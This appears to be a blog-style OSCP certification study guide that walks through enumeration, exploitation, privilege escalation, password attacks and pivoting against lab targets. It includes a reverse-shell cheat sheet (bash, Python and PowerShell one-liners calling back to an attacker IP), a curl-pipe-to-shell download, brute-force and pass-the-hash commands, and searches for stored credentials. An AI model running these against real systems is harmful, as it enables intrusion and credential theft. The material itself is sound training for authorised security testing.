The Offensive Security Certified Professional (OSCP) is still considered the gold standard for penetration testing certifications in 2026. Unlike multiple-choice exams, OSCP demands that you actually compromise machines within a 24-hour exam window — no shortcuts, no guessing. This guide walks you through everything: the essential tools, the must-know commands, the methodology, and the best free resources to get you from zero to exam-ready.
Phase 0: Mindset and Prerequisites
Before touching a single tool, understand what OSCP actually tests: manual exploitation skill, methodical enumeration, and persistence. Automated exploitation with Metasploit is severely limited in the exam. You need to understand how and why exploits work, not just run them.
Recommended prerequisites before starting PEN-200:
- Solid Linux command line skills (navigate, search, manage processes, edit files)
- Basic networking: TCP/IP, DNS, HTTP, SMB, FTP protocols
- Familiarity with Python scripting (modify public exploits, write simple automation)
- Complete TryHackMe’s “Pre-Security” and “Jr Penetration Tester” paths first
Phase 1: Reconnaissance and Enumeration
In OSCP, enumeration is everything. 80% of your time should be spent here. Most students fail not because they can’t exploit — they fail because they miss something during enumeration. Enumerate everything twice.
Network Scanning — Nmap
# Initial fast scan — find open ports quickly
nmap -T4 --open -p- 10.10.10.10
# Full version + script scan on discovered ports
nmap -sC -sV -p 22,80,443,445 10.10.10.10 -oA scan_results
# UDP scan (don't skip this — SNMP and DNS are often on UDP)
nmap -sU --top-ports 200 10.10.10.10
# Script scan for specific service
nmap --script=http-title,http-headers -p 80,443 10.10.10.10Pro tip: Always save output with -oA (all formats). During the exam, you will need to prove you found something — screenshots + saved scan files are your evidence.
Web Enumeration
# Directory brute-force with gobuster
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak
# Subdomain enumeration
gobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
# Nikto web vulnerability scanner
nikto -h http://10.10.10.10
# WPScan for WordPress targets
wpscan --url http://10.10.10.10 --enumerate u,p,tSMB Enumeration (Windows targets)
# List shares anonymously
smbclient -L //10.10.10.10 -N
# Connect to a share
smbclient //10.10.10.10/share -N
# Enum4linux — full SMB enumeration
enum4linux -a 10.10.10.10
# CrackMapExec — Swiss Army knife for SMB
crackmapexec smb 10.10.10.10 --shares
crackmapexec smb 10.10.10.10 -u admin -p Password123 --sharesOther Service Enumeration
# FTP — check anonymous login
ftp 10.10.10.10
# At prompt: user: anonymous, pass: anything
# SNMP enumeration (UDP 161)
snmpwalk -c public -v1 10.10.10.10
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 10.10.10.10
# LDAP enumeration
ldapsearch -x -h 10.10.10.10 -b "dc=domain,dc=com"
# MySQL (if exposed)
mysql -h 10.10.10.10 -u root -pPhase 2: Exploitation — Essential Tools
Searchsploit — Finding Public Exploits
# Search for exploits by service name + version
searchsploit apache 2.4.49
searchsploit "windows 10" privilege escalation
# Copy exploit to working directory
searchsploit -m 49512
# Mirror entire ExploitDB locally (already in Kali)
searchsploit -u # update databaseManual Exploit Modification
Most ExploitDB exploits need adjustment. The typical workflow is:
# 1. Copy exploit
searchsploit -m 49512
cp 49512.py /home/kali/exploits/
# 2. Read it — understand WHAT it does before running it
cat 49512.py | head -50
# 3. Modify target IP, port, payload
nano 49512.py
# 4. Check dependencies
pip install requests # or whatever it needs
# 5. Run it
python3 49512.py -t 10.10.10.10 -p 80Metasploit (use carefully — exam limits apply)
# Start Metasploit
msfconsole
# Search for module
search type:exploit name:eternal_blue
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set LHOST 10.10.10.11
runOSCP exam rule: Metasploit with automated payloads (multi/handler with meterpreter) can be used on ONE machine only. Learn to do everything manually — use Metasploit on your “bonus” machine if at all.
Reverse Shell Cheat Sheet
# Start listener (always do this FIRST)
nc -lvnp 4444
# Bash reverse shell
bash -i >& /dev/tcp/10.10.10.11/4444 0>&1
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.11",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
# PowerShell reverse shell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
# Upgrade shell to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z, stty raw -echo, fg, resetPhase 3: Post-Exploitation and Privilege Escalation
Getting a low-privilege shell is only the beginning. In OSCP, you need proof.txt from the root/Administrator account. Privilege escalation is the hardest part for most students.
Linux Privilege Escalation
# ALWAYS start with LinPEAS — it finds 90% of vectors
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Manual checks that LinPEAS covers (know these by heart):
# SUID binaries — can any be abused?
find / -perm -u=s -type f 2>/dev/null
# Sudo rights — what can this user run as root?
sudo -l
# Cron jobs running as root
cat /etc/crontab
ls -la /etc/cron*
# World-writable scripts run by root cron
find / -writable -type f 2>/dev/null | grep -v proc
# Interesting files — credentials, config files
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa" 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null
# Check kernel version for kernel exploits (last resort)
uname -aWindows Privilege Escalation
# WinPEAS — automated Windows privesc checker
.winPEASx64.exe
# Manual key checks:
# Current user and privileges
whoami /all
# Unquoted service paths (classic Windows vuln)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\"
# AlwaysInstallElevated registry key
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller
# Stored credentials
cmdkey /list
# If creds exist, use runas:
runas /savedcred /user:admin cmd.exe
# Token impersonation (SeImpersonatePrivilege)
.PrintSpoofer64.exe -i -c cmd
# Or: .GodPotato-NET4.exe -cmd "cmd /c whoami"
# Scheduled tasks
schtasks /query /fo LIST /vPassword Cracking and Credential Attacks
# Crack hashes with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack specific hash type with Hashcat
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# -m 0 = MD5, -m 1000 = NTLM, -m 1800 = sha512crypt
# Hydra — brute force login services
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ssh
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Pass-the-Hash (Windows)
crackmapexec smb 10.10.10.10 -u admin -H NTLM_HASH_HERE
pth-winexe -U admin%NTLM_HASH //10.10.10.10 cmd.exePhase 4: Pivoting and Tunneling
# SSH local port forwarding (access internal service)
ssh -L 8080:192.168.1.10:80 user@10.10.10.10
# SSH dynamic SOCKS proxy (route all traffic through host)
ssh -D 1080 user@10.10.10.10
# Configure proxychains to use 127.0.0.1:1080
proxychains nmap -sT 192.168.1.0/24
# Chisel for tunneling through firewalls
# On attacker:
chisel server -p 9001 --reverse
# On victim:
chisel client 10.10.10.11:9001 R:1080:socks
# Ligolo-ng (modern, recommended for OSCP 2026)
# Attacker:
./proxy -selfcert
# Victim:
./agent -connect 10.10.10.11:11601 -ignore-certThe OSCP Methodology: Start to Finish
Here is the complete flow you should follow for every single machine, whether in practice labs or the exam:
- Scan all ports —
nmap -p-to find everything open - Version detect + default scripts —
nmap -sC -sVon found ports - Enumerate each service — web, SMB, FTP, SSH, RPC, LDAP, SNMP — leave nothing unchecked
- Look for known CVEs —
searchsploit service_name version - Web apps — directory brute force, check source code, look for SQLi/LFI/RFI/SSRF
- Get initial foothold — low-privilege shell access
- System info + user context —
whoami,uname -a,hostname - Run privesc scripts — LinPEAS or WinPEAS
- Identify and exploit privesc vector — SUID, sudo, cron, service, token
- Get root/SYSTEM — retrieve
proof.txt - Document everything — screenshot + save outputs at every step
Best Free Resources for OSCP Preparation
Platforms
- TryHackMe — Best for beginners, guided rooms, “Jr Penetration Tester” path is OSCP-aligned
- Hack The Box — Harder machines, more exam-like. Complete 20+ retired machines with writeups
- PortSwigger Web Academy — Free, the absolute best resource for web app hacking (SQLi, XSS, SSRF, etc.)
- VulnHub — Download free VMs to practice locally with no subscription needed
- PentesterLab — Excellent for web vulnerabilities and real CVE practice
Must-Read References
- GTFOBins (gtfobins.github.io) — How to abuse Unix binaries for privesc
- LOLBAS (lolbas-project.github.io) — Windows “Living Off the Land” binaries
- HackTricks (book.hacktricks.xyz) — The OSCP bible. Every technique, every attack vector, organized by category
- PayloadsAllTheThings (GitHub) — Payload lists for every vulnerability type
- RevShells.com — Generate reverse shell one-liners in any language
Specific HTB Machines for OSCP Prep
These retired machines are consistently recommended as OSCP-like training (use writeups after attempting yourself): Blue, Legacy, Devel, Bastard, Beep, Optimum, Arctic, Granny, Grandpa, Jerry, Knife, Irked, Nibbles, Mirai, Networked, Bashed, OpenAdmin, Magic, ServMon
Exam Day Tips
- Start with the 20-point standalone machines — easier, build momentum and confidence
- Set a timer — if stuck for 45 minutes, move on and come back
- Screenshot everything — scan output, exploit commands, shell access, proof.txt with IP
- Read the proof.txt — you need to type
cat proof.txtwith your IP visible in the same screenshot - Sleep — the exam is 24 hours but most people succeed in 18. Fatigue causes mistakes
- Use your notes — you can use any notes during the exam. Have templates ready
OSCP is hard, but it is absolutely passable with the right preparation. The community is large and welcoming — if you’re stuck, the r/oscp subreddit and the OffSec Discord are excellent places to get unstuck. The journey itself will make you a significantly better security professional than any other certification path.